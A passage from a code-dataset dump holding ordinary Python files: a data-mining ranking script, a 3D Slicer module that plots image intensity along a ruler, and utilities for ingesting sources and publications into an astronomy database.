num1.sum[hi]= nums.sum[b]\n for i in range(hi-1, lo-1, -1):\n b = div.order[i]['=']\n num1.n[i] = num1.n[i+1] + nums.n[b]\n num1.sum[i] = num1.sum[i+1] + nums.sum[b]\n return num1.sum[lo]/num1.n[lo]\n\n\ndef divm(lo, hi, nums, div):\n num0 = Num()\n num1 = Num()\n muAll = divInits(lo,hi,nums, div, num0, num1)\n maxv = -1\n cut = None\n for i in range(lo+1, hi+1):\n b = div.order[i]['=']\n num0.n[i] = num0.n[i-1] + nums.n[b]\n num0.sum[i] = num0.sum[i-1] + nums.sum[b]\n left = num0.n[i]\n muLeft = num0.sum[i]/left\n right = num1.n[i]\n muRight = num1.sum[i]/right\n e = errDiff(muAll, left, muLeft, right, muRight)\n if div.cohen:\n if abs(muLeft - muRight) <= float(div.cohen): continue\n if div.mittas:\n if e < maxv:continue\n if div.a12:\n if bigger(lo, i, hi, nums, div) < float(div.a12):continue\n maxv = e\n cut = i \n return cut \n\ndef errDiff(mu, n0, mu0, n1, mu1):\n return n0*(mu - mu0)**2.0 + n1*(mu - mu1)**2.0\n \ndef bigger(lo, mid, hi, nums, div):\n below = values(lo, mid-1, nums, div)\n above = values(mid, hi, nums, div)\n return a12statistic(below, above)\n \ndef values(i, j, nums, div):\n out = []\n for k in range(i, j+1):\n b = div.order[k]['=']\n out += nums.x[b]\n return out\n\ndef a12statistic(below, above):\n comparisons = more = same = 0 \n for j in range(len(above)):\n for i in range(len(below)):\n comparisons = comparisons + 1\n more = more + 1 if above[j] > below[i] else more\n same = same + 1 if above[j] == below[i] else more\n return (more + 0.5*same)/comparisons\n\n","sub_path":"CS573_DataMining_Python/Proj1i_DataReduction/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"175719777","text":"import os\nimport unittest\nimport vtk\nimport qt\nimport ctk\nimport slicer\nfrom slicer.ScriptedLoadableModule import *\nimport logging\n\n#\n# LineIntersityProfile\n#\n\n\nclass LineIntersityProfile(ScriptedLoadableModule):\n\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n # TODO make this more human readable by adding spaces\n self.parent.title = \"LineIntersityProfile\"\n self.parent.categories = [\"Examples\"]\n self.parent.dependencies = []\n # replace with \"Firstname Lastname (Organization)\"\n self.parent.contributors = [\"John Doe (AnyWare Corp.)\"]\n self.parent.helpText = \"\"\"\n This is an example of scripted loadable module bundled in an extension.\n It performs a simple thresholding on the input volume and optionally captures a screenshot.\n \"\"\"\n self.parent.acknowledgementText = \"\"\"\n This file was originally developed by Jean-Christophe Fillion-Robin, Kitware Inc.\n and Steve Pieper, Isomics, Inc. and was partially funded by NIH grant 3P41RR013218-12S1.\n\"\"\" # replace with organization, grant and thanks.\n\n#\n# LineIntersityProfileWidget\n#\n\n\nclass LineIntersityProfileWidget(ScriptedLoadableModuleWidget):\n\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n # Instantiate and connect widgets ...\n\n #\n # Parameters Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Parameters\"\n self.layout.addWidget(parametersCollapsibleButton)\n\n # Layout within the dummy collapsible button\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n\n #\n # Fisrt input volume selector\n #\n self.inputSelector1 = slicer.qMRMLNodeComboBox()\n self.inputSelector1.nodeTypes = ((\"vtkMRMLScalarVolumeNode\"), \"\")\n self.inputSelector1.addAttribute(\n \"vtkMRMLScalarVolumeNode\", \"LabelMap\", 0)\n self.inputSelector1.selectNodeUponCreation = True\n self.inputSelector1.addEnabled = False\n self.inputSelector1.removeEnabled = False\n self.inputSelector1.noneEnabled = False\n self.inputSelector1.showHidden = False\n self.inputSelector1.showChildNodeTypes = False\n self.inputSelector1.setMRMLScene(slicer.mrmlScene)\n self.inputSelector1.setToolTip(\"Pick the first input\")\n parametersFormLayout.addRow(\"First Volume\", self.inputSelector1)\n\n #\n # Second input volume selector\n #\n self.inputSelector2 = slicer.qMRMLNodeComboBox()\n self.inputSelector2.nodeTypes = ((\"vtkMRMLScalarVolumeNode\"), \"\")\n self.inputSelector2.addAttribute(\n \"vtkMRMLScalarVolumeNode\", \"LabelMap\", 0)\n self.inputSelector2.selectNodeUponCreation = True\n self.inputSelector2.addEnabled = False\n self.inputSelector2.removeEnabled = False\n self.inputSelector2.noneEnabled = False\n self.inputSelector2.showHidden = False\n self.inputSelector2.showChildNodeTypes = False\n self.inputSelector2.setMRMLScene(slicer.mrmlScene)\n self.inputSelector2.setToolTip(\"Pick the second input\")\n parametersFormLayout.addRow(\"Second Volume\", self.inputSelector2)\n #\n # output volume selector\n #\n # self.outputSelector = slicer.qMRMLNodeComboBox()\n # self.outputSelector.nodeTypes = [\"vtkMRMLScalarVolumeNode\"]\n # self.outputSelector.selectNodeUponCreation = True\n # self.outputSelector.addEnabled = True\n # self.outputSelector.removeEnabled = True\n # self.outputSelector.noneEnabled = True\n # self.outputSelector.showHidden = False\n # self.outputSelector.showChildNodeTypes = False\n # self.outputSelector.setMRMLScene(slicer.mrmlScene)\n # self.outputSelector.setToolTip(\"Pick the output to the algorithm.\")\n # parametersFormLayout.addRow(\"Output Volume: \", self.outputSelector)\n\n #\n # Ruler selector\n #\n self.rulerSelector = slicer.qMRMLNodeComboBox()\n self.rulerSelector.nodeTypes = ((\"vtkMRMLAnnotationRulerNode\"), \"\")\n self.rulerSelector.selectNodeUponCreation = True\n self.rulerSelector.addEnabled = False\n self.rulerSelector.removeEnabled = False\n self.rulerSelector.noneEnabled = False\n self.rulerSelector.showHidden = False\n self.rulerSelector.showChildNodeTypes = False\n self.rulerSelector.setMRMLScene(slicer.mrmlScene)\n self.rulerSelector.setToolTip(\"Pick the ruler to sample along.\")\n parametersFormLayout.addRow(\"Ruler: \", self.rulerSelector)\n\n #\n # Apply Button\n #\n self.applyButton = qt.QPushButton(\"Apply\")\n self.applyButton.toolTip = \"Run the algorithm.\"\n self.applyButton.enabled = True\n parametersFormLayout.addRow(self.applyButton)\n\n # connections\n self.applyButton.connect('clicked(bool)', self.onApplyButton)\n # self.inputSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelect)\n # self.outputSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelect)\n\n # Add vertical spacer\n self.layout.addStretch(1)\n\n # Refresh Apply button state\n self.onSelect()\n\n def cleanup(self):\n pass\n\n def onSelect(self):\n self.applyButton.enabled = self.inputSelector1.currentNode(\n ) and self.inputSelector2.currentNode()\n\n def onApplyButton(self):\n logic = LineIntersityProfileLogic()\n print(\"Run the algorithm\")\n logic.run(self.inputSelector1.currentNode(),\n self.inputSelector2.currentNode(),\n self.rulerSelector.currentNode())\n\n#\n# LineIntersityProfileLogic\n#\n\n\nclass LineIntersityProfileLogic(ScriptedLoadableModuleLogic):\n\n \"\"\"This class should implement all the actual\n computation done by your module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def hasImageData(self, volumeNode):\n \"\"\"This is an example logic method that\n returns true if the passed in volume\"E202\"\n node has valid image data\n \"\"\"\n if not volumeNode:\n logging.debug('hasImageData futoailed: no volume node')\n return False\n if volumeNode.GetImageData() is None:\n logging.debug('hasImageData failed: no image data in volume node')\n return False\n return True\n\n def isValidInputOutputData(self, inputVolumeNode, outputVolumeNode):\n \"\"\"Validates if the output is not the same as input\n \"\"\"\n if not inputVolumeNode:\n logging.debug(\n 'isValidInputOutputData failed: no input volume node defined')\n return False\n if not outputVolumeNode:\n logging.debug(\n 'isValidInputOutputData failed: no output volume node defined')\n return False\n if inputVolumeNode.GetID() == outputVolumeNode.GetID():\n logging.debug(\n 'isValidInputOutputData failed: input and output volume is the same. Create a new volume for output to avoid this error.')\n return False\n return True\n\n def takeScreenshot(self, name, description, type=-1):\n # show the message even if not taking a screen shot\n slicer.util.delayDisplay(\n 'Take screenshot: '+description+'.\\nResult is available in the Annotations module.', 3000)\n\n lm = slicer.app.layoutManager()\n # switch on the type to get the requested window\n widget = 0\n if type == slicer.qMRMLScreenShotDialog.FullLayout:\n # full layout\n widget = lm.viewport()\n elif type == slicer.qMRMLScreenShotDialog.ThreeD:\n # just the 3D window\n widget = lm.threeDWidget(0).threeDView()\n elif type == slicer.qMRMLScreenShotDialog.Red:\n # red slice window\n widget = lm.sliceWidget(\"Red\")\n elif type == slicer.qMRMLScreenShotDialog.Yellow:\n # yellow slice window\n widget = lm.sliceWidget(\"Yellow\")\n elif type == slicer.qMRMLScreenShotDialog.Green:\n # green slice window\n widget = lm.sliceWidget(\"Green\")\n else:\n # default to using the full window\n widget = slicer.util.mainWindow()\n # reset the type so that the node is set correctly\n type = slicer.qMRMLScreenShotDialog.FullLayout\n\n # grab and convert to vtk image data\n qpixMap = qt.QPixmap().grabWidget(widget)\n qimage = qpixMap.toImage()\n imageData = vtk.vtkImageData()\n slicer.qMRMLUtils().qImageToVtkImageData(qimage, imageData)\n\n annotationLogic = slicer.modules.annotations.logic()\n annotationLogic.CreateSnapShot(name, description, type, 1, imageData)\n\n def run(self, volumeNode1, volumeNode2, rulerNode):\n \"\"\"\n Run the actual algorith\n \"\"\"\n print('LineIntensityProfileLogic run() called')\n\n \"\"\"\n S1. Get the list of intensity samples along the ruler\n S2. Set up quantitative layout\n S3. Use the chart view to plot the intensity samples\n \"\"\"\n\n # S1. Get the list of samples\n if not rulerNode or (not volumeNode1 and not volumeNode2):\n print('Inputs are not initialised!')\n return\n\n volumeSamples1 = None\n volumeSamples2 = None\n\n if volumeNode1:\n volumeSamples1 = self.probeVolume(volumeNode1, rulerNode)\n if volumeNode2:\n volumeSamples2 = self.probeVolume(volumeNode2, rulerNode)\n\n print('VolumeSamples1 = ' + str(volumeSamples1))\n print('VolumeSamples2 = ' + str(volumeSamples2))\n\n # Running showChart() method\n imageSamples = [volumeSamples1, volumeSamples2]\n legendNames = [volumeNode1.GetName()+' - '+rulerNode.GetName(),\n volumeNode2.GetName()+' - '+rulerNode.GetName()]\n self.showChart(imageSamples, legendNames)\n\n return True\n\n def probeVolume(self, volumeNode, rulerNode):\n\n # get ruler ednpoints coordinates in RAS\n p0ras = rulerNode.GetPolyData().GetPoint(0) + (1,)\n p1ras = rulerNode.GetPolyData().GetPoint(1) + (1,)\n\n # RAS --> IJK\n ras2ijk = vtk.vtkMatrix4x4()\n volumeNode.GetRASToIJKMatrix(ras2ijk)\n p0ijk = [int(round(c)) for c in ras2ijk.MultiplyPoint(p0ras)[:3]]\n p1ijk = [int(round(c)) for c in ras2ijk.MultiplyPoint(p1ras)[:3]]\n\n # Create VTK line that will be used for sampling\n line = vtk.vtkLineSource()\n line.SetResolution(100)\n line.SetPoint1(p0ijk)\n line.SetPoint2(p1ijk)\n\n # Create VTK probe filter and sample the image\n probe = vtk.vtkProbeFilter()\n probe .SetInputConnection(line.GetOutputPort())\n probe.SetSourceData(volumeNode.GetImageData())\n probe.Update()\n\n # Return VTK array\n return probe.GetOutput().GetPointData().GetArray('ImageScalars')\n\n def showChart(self, samples, names):\n print('Logic showing chart\\n')\n\n # S2. Switch to a layout containing a chart viewer\n lm = slicer.app.layoutManager()\n lm.setLayout(\n slicer.vtkMRMLLayoutNode.SlicerLayoutFourUpQuantitativeView)\n\n # Initialise double array MRML node for each sample list\n # since this is what chart view MRML node needs\n doubleArrays = []\n for sample in samples:\n arrayNode = slicer.mrmlScene.AddNode(\n slicer.vtkMRMLDoubleArrayNode())\n array = arrayNode.GetArray()\n nDataPoints = sample.GetNumberOfTuples()\n array.SetNumberOfTuples(nDataPoints)\n array.SetNumberOfComponents(3)\n for i in range(nDataPoints):\n array.SetComponent(i, 0, i)\n array.SetComponent(i, 1, sample.GetTuple1(i))\n array.SetComponent(i, 2, 0)\n\n doubleArrays.append(arrayNode)\n\n # S3. Get the chart view MRML node\n cvNodes = slicer.mrmlScene.GetNodesByClass('vtkMRMLChartViewNode')\n cvNodes.SetReferenceCount(cvNodes.GetReferenceCount()-1)\n cvNodes.InitTraversal()\n cvNode = cvNodes.GetNextItemAsObject()\n\n # Create a new chart node\n chartNode = slicer.mrmlScene.AddNode(slicer.vtkMRMLChartNode())\n for pairs in zip(names, doubleArrays):\n chartNode.AddArray(pairs[0], pairs[1].GetID())\n cvNode.SetChartNodeID(chartNode.GetID())\n\n return\n\n\nclass LineIntersityProfileTest(ScriptedLoadableModuleTest):\n\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear(0)\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n self.test_LineIntersityProfile1()\n\n def test_LineIntersityProfile1(self):\n \"\"\" Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n #\n # first, get some data\n #\n import urllib\n downloads = (\n ('http://slicer.kitware.com/midas3/download?items=5767',\n 'FA.nrrd', slicer.util.loadVolume),\n )\n\n for url, name, loader in downloads:\n filePath = slicer.app.temporaryPath + '/' + name\n if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:\n logging.info(\n 'Requesting download %s from %s...\\n' % (name, url))\n urllib.urlretrieve(url, filePath)\n if loader:\n logging.info('Loading %s...' % (name,))\n loader(filePath)\n self.delayDisplay('Finished with download and loading')\n\n volumeNode = slicer.util.getNode(pattern=\"FA\")\n logic = LineIntersityProfileLogic()\n self.assertTrue(logic.hasImageData(volumeNode))\n # self.delayDisplay('Test passed!')\n\n # Add Test\n # Initialise rule node in a know location\n rulerNode = slicer.vtkMRMLAnnotationRulerNode()\n slicer.mrmlScene.AddNode(rulerNode)\n rulerNode.SetPosition1(-65, 110, 60)\n rulerNode.SetPosition2(-15, 60, 60)\n rulerNode.SetName('Test')\n\n # Initialise input selectors\n moduleWidget = slicer.modules.LineIntersityProfileWidget\n # Note: the end has no \"()\", or a __init__ function required!\n\n moduleWidget.rulerSelector.setCurrentNode(rulerNode)\n moduleWidget.inputSelector1.setCurrentNode(volumeNode)\n moduleWidget.inputSelector2.setCurrentNode(volumeNode)\n\n self.delayDisplay(\"Inputs initialised!\")\n\n # run the logic with the initialised inputs\n moduleWidget.onApplyButton()\n\n self.delayDisplay(\"if you see a ruler and a plot - test passed!\")\n","sub_path":"LineIntersityProfile.py","file_name":"LineIntersityProfile.py","file_ext":"py","file_size_in_byte":16360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528179730","text":"\"\"\"\nUtils functions for use in ingests\n\"\"\"\nfrom collections import namedtuple\nimport sys\nimport os\nimport re\nimport warnings\n\nfrom pathlib import Path\nfrom astrodbkit2.astrodb import create_database\nfrom astrodbkit2.astrodb import Database\nfrom simple.schema import *\nimport ads\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom astroquery.simbad import Simbad\nfrom astropy.table import Table\n# from contextlib import contextmanager\nfrom sqlalchemy import or_\nfrom sqlalchemy import and_\nimport sqlalchemy.exc\n# import sqlite3\nimport numpy as np\n\n# import astrodbkit2\n\nwarnings.filterwarnings(\"ignore\", module='astroquery.simbad')\n\n\nclass SimpleError(Exception):\n pass\n\n\ndef verboseprint(*args, **kwargs):\n if 'verbose' in kwargs.keys() and kwargs['verbose']:\n del kwargs['verbose']\n return print(*args, **kwargs)\n else:\n return\n\n\n# TODO: commented out as not using with the new custom error\n# @contextmanager\n# def disable_exception_traceback():\n# \"\"\"\n# All traceback information is suppressed and only the exception type and value are printed\n# \"\"\"\n# default_value = getattr(sys, \"tracebacklimit\", 1000) # `1000` is a Python's default value\n# sys.tracebacklimit = 0\n# yield\n# sys.tracebacklimit = default_value # revert changes\n\n\ndef load_simpledb(db_file, RECREATE_DB=True):\n # Utility function to load the database\n\n db_file_path = Path(db_file)\n db_connection_string = 'sqlite:///SIMPLE.db'\n\n if RECREATE_DB and db_file_path.exists():\n os.remove(db_file) # removes the current .db file if one already exists\n\n if not db_file_path.exists():\n create_database(db_connection_string) # creates empty database based on the simple schema\n db = Database(db_connection_string) # connects to the empty database\n db.load_database('data/') # loads the data from the data files into the database\n else:\n db = Database(db_connection_string) # if database already exists, connects to .db file\n\n return db\n\n\ndef sort_sources(db, ingest_names, ingest_ras, ingest_decs, search_radius=60., verbose=False):\n \"\"\"\n Classifying sources to be ingested into the database into three categories:\n 1) in the database with the same name,\n 2) in the database with a different name, or\n 3) not in the database and need to be added.\n\n\n Parameters\n ----------\n db\n ingest_names\n Names of sources\n ingest_ras\n Right ascensions of sources. Decimal degrees.\n ingest_decs\n Declinations of sources. Decimal degrees.\n search_radius\n radius in arcseconds to use for source matching\n verbose\n\n Returns\n -------\n missing_sources_index\n Indices of sources which are not in the database\n existing_sources_index\n Indices of sources which are already in the database\n alt_names_table\n List of tuples with Other Names to add to database\n \"\"\"\n\n existing_sources_index = []\n missing_sources_index = []\n Alt_names = namedtuple(\"Alt_names\", \"source other_name\")\n alt_names_table = []\n db_names = []\n\n for i, name in enumerate(ingest_names):\n verboseprint(\"\\n\", i, \": searching:,\", name, verbose=verbose)\n\n namematches = db.search_object(name)\n\n # if no matches, try resolving with Simbad\n if len(namematches) == 0:\n verboseprint(i, \": no name matches, trying simbad search\", verbose=verbose)\n try:\n namematches = db.search_object(name, resolve_simbad=True, verbose=verbose)\n if len(namematches) == 1:\n simbad_match = namematches[0]['source']\n # Populate list with ingest name and database name match\n alt_names_table.append(Alt_names(simbad_match, name))\n except TypeError: # no Simbad match\n namematches = []\n\n # if still no matches, try spatial search using coordinates\n if len(namematches) == 0:\n location = SkyCoord(ingest_ras[i], ingest_decs[i], frame='icrs', unit='deg')\n radius = u.Quantity(search_radius, unit='arcsec')\n verboseprint(i, \": no Simbad match, trying coord search around \", location.ra.hour, location.dec,\n verbose=verbose)\n nearby_matches = db.query_region(location, radius=radius)\n if len(nearby_matches) == 1:\n namematches = nearby_matches\n coord_match = namematches[0]['source']\n # Populate list with ingest name and database name match\n alt_names_table.append(Alt_names(coord_match, name))\n if len(nearby_matches) > 1:\n print(nearby_matches)\n raise RuntimeError(\"too many nearby sources!\")\n\n if len(namematches) == 1:\n existing_sources_index.append(i)\n source_match = namematches[0]['source']\n db_names.append(source_match)\n verboseprint(i, \"match found: \", source_match, verbose=verbose)\n elif len(namematches) > 1:\n raise RuntimeError(i, \"More than one match for \", name, \"/n,\", namematches)\n elif len(namematches) == 0:\n verboseprint(i, \": Not in database\", verbose=verbose)\n missing_sources_index.append(i)\n db_names.append(ingest_names[i])\n else:\n raise RuntimeError(i, \"unexpected condition\")\n\n verboseprint(\"\\n ALL SOURCES SORTED\", verbose=verbose)\n verboseprint(\"\\n Existing Sources:\\n\", ingest_names[existing_sources_index], verbose=verbose)\n verboseprint(\"\\n Missing Sources:\\n\", ingest_names[missing_sources_index], verbose=verbose)\n verboseprint(\"\\n Existing Sources with different name:\\n\", verbose=verbose)\n if verbose:\n # TODO: does pprint_all work here? If it's just a list that's undefined\n # alt_names_table.pprint_all()\n pass\n\n n_ingest = len(ingest_names)\n n_existing = len(existing_sources_index)\n n_alt = len(alt_names_table)\n n_missing = len(missing_sources_index)\n\n if n_ingest != n_existing + n_missing:\n raise RuntimeError(\"Unexpected number of sources\")\n\n print(n_existing, \"sources already in database.\")\n print(n_alt, \"sources found with alternate names\")\n print(n_missing, \"sources not found in the database\")\n\n return missing_sources_index, existing_sources_index, alt_names_table\n\n\ndef add_names(db, sources=None, other_names=None, names_table=None, verbose=True):\n \"\"\"\n Add source names to the Names table in the database.\n Provide either two lists of sources and other_names or a 2D names_table.\n\n Parameters\n ----------\n db\n sources\n list of source names which already exist in the database\n other_names\n list of alternate names for sources\n names_table\n table with source and other_names.\n Expecting source name to be first column and other_names in the 2nd.\n verbose\n \"\"\"\n\n if names_table is not None and sources is not None:\n raise RuntimeError(\"Both names table and sources list provided. Provide one or the other\")\n\n names_data = []\n\n\n if sources is not None or other_names is not None:\n # Length of sources and other_names list should be equal\n if len(sources) != len(other_names):\n raise RuntimeError(\"Length of sources and other_names should be equal\")\n\n for source, other_name in zip(sources, other_names):\n names_data.append({'source': source, 'other_name': other_name})\n\n if names_table is not None:\n if len(names_table[0]) != 2:\n raise RuntimeError(\"Each row should have two elements\")\n\n for name_row in names_table:\n names_data.append({'source': name_row[0], 'other_name': name_row[1]})\n\n db.Names.insert().execute(names_data)\n\n n_added = len(names_data)\n\n print(\"Names added to database: \", n_added)\n\n return\n\n\ndef search_publication(db, name: str = None, doi: str = None, bibcode: str = None, verbose: bool = False):\n \"\"\"\n Find publications in the database by matching on the publication name, doi, or bibcode\n\n Parameters\n ----------\n db\n Variable referencing the database to search\n name: str\n Name of publication to search\n doi: str\n DOI of publication to search\n bibcode: str\n ADS Bibcode of publication to search\n verbose : bool\n\n Returns\n -------\n True, 1: if only one match\n False, 0: No matches\n False, N_matches: Mulptiple matches\n\n Examples\n -------\n >>> test = search_publication(db, name='Cruz')\n Found 8 matching publications for Cruz or None or None\n\n >>> test = search_publication(db, name='Kirk19', verbose=True)\n Found 1 matching publications for Kirk19 or None or None\n name bibcode doi\n ------ ------------------- ------------------------\n Kirk19 2019ApJS..240...19K 10.3847/1538-4365/aaf6af\n description\n -----------------------------------------------------------------------------\n Preliminary Trigonometric Parallaxes of 184 Late-T and Y Dwarfs and an\n Analysis of the Field Substellar Mass Function into the Planetary Mass Regime\n\n >>> test = search_publication(db, name='Smith')\n No matching publications for Smith, Trying Smit\n No matching publications for Smit\n Use add_publication() to add it to the database.\n\n See Also\n --------\n add_publication: Function to add publications in the database\n\n \"\"\"\n\n # Make sure a search term is provided\n if name is None and doi is None and bibcode is None:\n print(\"Name, Bibcode, or DOI must be provided\")\n return False, 0\n\n not_null_pub_filters = []\n if name:\n # fuzzy_query_name = '%' + name + '%'\n not_null_pub_filters.append(db.Publications.c.name.ilike(name))\n if doi:\n not_null_pub_filters.append(db.Publications.c.doi.ilike(doi))\n if bibcode:\n not_null_pub_filters.append(db.Publications.c.bibcode.ilike(bibcode))\n pub_search_table = Table()\n if len(not_null_pub_filters) > 0:\n pub_search_table = db.query(db.Publications).filter(or_(*not_null_pub_filters)).table()\n\n n_pubs_found = len(pub_search_table)\n\n if n_pubs_found == 1:\n verboseprint(f'Found {n_pubs_found} matching publications for {name} or {doi} or {bibcode}', verbose=verbose)\n if verbose:\n pub_search_table.pprint_all()\n return True, 1\n\n if n_pubs_found > 1:\n verboseprint(f'Found {n_pubs_found} matching publications for {name} or {doi} or {bibcode}', verbose=verbose)\n if verbose:\n pub_search_table.pprint_all()\n return False, n_pubs_found\n\n # If no matches found, search using first four characters of input name\n if n_pubs_found == 0 and name:\n shorter_name = name[:4]\n verboseprint(f'No matching publications for {name}, Trying {shorter_name}', verbose=verbose)\n fuzzy_query_shorter_name = '%' + shorter_name + '%'\n pub_search_table = db.query(db.Publications).filter(\n db.Publications.c.name.ilike(fuzzy_query_shorter_name)).table()\n n_pubs_found_short = len(pub_search_table)\n if n_pubs_found_short == 0:\n verboseprint(f'No matching publications for {shorter_name}', verbose=verbose)\n verboseprint('Use add_publication() to add it to the database.', verbose=verbose)\n return False, 0\n\n if n_pubs_found_short > 0:\n print(f'Found {n_pubs_found_short} matching publications for {shorter_name}')\n if verbose:\n pub_search_table.pprint_all()\n return False, n_pubs_found_short\n else:\n return False, n_pubs_found\n\n return\n\n\ndef add_publication(db, doi: str = None, bibcode: str = None, name: str = None, description: str = None,\n ignore_ads: bool = False, save_db=False,\n verbose: bool = True):\n \"\"\"\n Adds publication to the database using DOI or ADS Bibcode, including metadata found with ADS.\n\n In order to auto-populate the fields, An $ADS_TOKEN environment variable must be set.\n See https://ui.adsabs.harvard.edu/user/settings/token\n\n Parameters\n ----------\n db\n Database object\n doi, bibcode: str\n The DOI or ADS Bibcode of the reference. One of these is required input.\n name: str, optional\n The publication shortname, otherwise it will be generated [optional]\n Convention is the first four letters of first authors last name and two digit year (e.g., Smit21)\n For last names which are less than four letters, use '_' or first name initial(s). (e.g, Xu__21 or LiYB21)\n description: str, optional\n Description of the paper, typically the title of the papre [optional]\n ignore_ads: bool\n save_db: bool\n verbose: bool\n\n See Also\n --------\n search_publication: Function to find publications in the database\n\n \"\"\"\n\n if not (doi or bibcode):\n print('DOI or Bibcode is required input')\n return\n\n ads.config.token = os.getenv('ADS_TOKEN')\n\n if not ads.config.token and (not name and (not doi or not bibcode)):\n print(\"An ADS_TOKEN environment variable must be set in order to auto-populate the fields.\\n\"\n \"Without an ADS_TOKEN, name and bibcode or DOI must be set explicity.\")\n return\n\n if ads.config.token and not ignore_ads:\n use_ads = True\n else:\n use_ads = False\n\n if bibcode:\n if 'arXiv' in bibcode:\n arxiv_id = bibcode\n bibcode = None\n else:\n arxiv_id = None\n else:\n arxiv_id = None\n\n name_add, bibcode_add, doi_add = '', '', ''\n # Search ADS uing a provided arxiv id\n if arxiv_id and use_ads:\n arxiv_matches = ads.SearchQuery(q=arxiv_id, fl=['id', 'bibcode', 'title', 'first_author', 'year', 'doi'])\n arxiv_matches_list = list(arxiv_matches)\n if len(arxiv_matches_list) != 1:\n print('should only be one matching arxiv id')\n return\n\n if len(arxiv_matches_list) == 1:\n verboseprint(\"Publication found in ADS using arxiv id: \", arxiv_id, verbose=verbose)\n article = arxiv_matches_list[0]\n verboseprint(article.first_author, article.year, article.bibcode, article.title, verbose=verbose)\n if not name: # generate the name if it was not provided\n name_stub = article.first_author.replace(',', '').replace(' ', '')\n name_add = name_stub[0:4] + article.year[-2:]\n else:\n name_add = name\n description = article.title[0]\n bibcode_add = article.bibcode\n doi_add = article.doi[0]\n\n elif arxiv_id:\n name_add = name\n bibcode_add = arxiv_id\n doi_add = doi\n\n # Search ADS using a provided DOI\n if doi and use_ads:\n doi_matches = ads.SearchQuery(doi=doi, fl=['id', 'bibcode', 'title', 'first_author', 'year', 'doi'])\n doi_matches_list = list(doi_matches)\n if len(doi_matches_list) != 1:\n print('should only be one matching DOI')\n return\n\n if len(doi_matches_list) == 1:\n verboseprint(\"Publication found in ADS using DOI: \", doi, verbose=verbose)\n article = doi_matches_list[0]\n verboseprint(article.first_author, article.year, article.bibcode, article.title, verbose=verbose)\n if not name: # generate the name if it was not provided\n name_stub = article.first_author.replace(',', '').replace(' ', '')\n name_add = name_stub[0:4] + article.year[-2:]\n else:\n name_add = name\n description = article.title[0]\n bibcode_add = article.bibcode\n doi_add = article.doi[0]\n elif doi:\n name_add = name\n bibcode_add = bibcode\n doi_add = doi\n\n if bibcode and use_ads:\n bibcode_matches = ads.SearchQuery(bibcode=bibcode, fl=['id', 'bibcode', 'title', 'first_author', 'year', 'doi'])\n bibcode_matches_list = list(bibcode_matches)\n if len(bibcode_matches_list) == 0:\n print('not a valid bibcode:', bibcode)\n print('nothing added')\n raise\n\n elif len(bibcode_matches_list) > 1:\n print('should only be one matching bibcode for:', bibcode)\n print('nothing added')\n raise\n\n elif len(bibcode_matches_list) == 1:\n verboseprint(\"Publication found in ADS using bibcode: \", bibcode, verbose=verbose)\n article = bibcode_matches_list[0]\n verboseprint(article.first_author, article.year, article.bibcode, article.doi, article.title,\n verbose=verbose)\n if not name: # generate the name if it was not provided\n name_stub = article.first_author.replace(',', '').replace(' ', '')\n name_add = name_stub[0:4] + article.year[-2:]\n else:\n name_add = name\n description = article.title[0]\n bibcode_add = article.bibcode\n if article.doi is None:\n doi_add = None\n else:\n doi_add = article.doi[0]\n elif bibcode:\n name_add = name\n bibcode_add = bibcode\n doi_add = doi\n\n new_ref = [{'name': name_add, 'bibcode': bibcode_add, 'doi': doi_add, 'description': description}]\n\n try:\n db.Publications.insert().execute(new_ref)\n verboseprint(f'Added {name_add} to Publications table', verbose=verbose)\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"It's possible that a similar publication already exists in database\\n\"\n \"Use search_publication function before adding a new record\")\n\n if save_db:\n db.save_reference_table(table='Publications', directory='data/')\n verboseprint(\"Publication added to database and saved: \", name_add, verbose=verbose)\n else:\n verboseprint(\"Publication added to database: \", name_add, verbose=verbose)\n\n return\n\n# TODO: commented out as not complete\n# def update_publication(db, doi: str = None, bibcode: str = None, name: str = None, description: str = None,\n# save_db: bool = True):\n# \"\"\"\n# Updates publications in the database, including metadata found with ADS.\n#\n# In order to auto-populate the fields, An $ADS_TOKEN environment variable must be set.\n# See https://ui.adsabs.harvard.edu/user/settings/token\n#\n# Parameters\n# ----------\n# db\n# Database object\n# doi, bibcode: str\n# The DOI or ADS Bibcode of the reference.\n# name: str, optional\n# The publication shortname, otherwise it will be generated [optional]\n# description: str, optional\n# Description of the paper, typically the title of the papre [optional]\n# save_db: 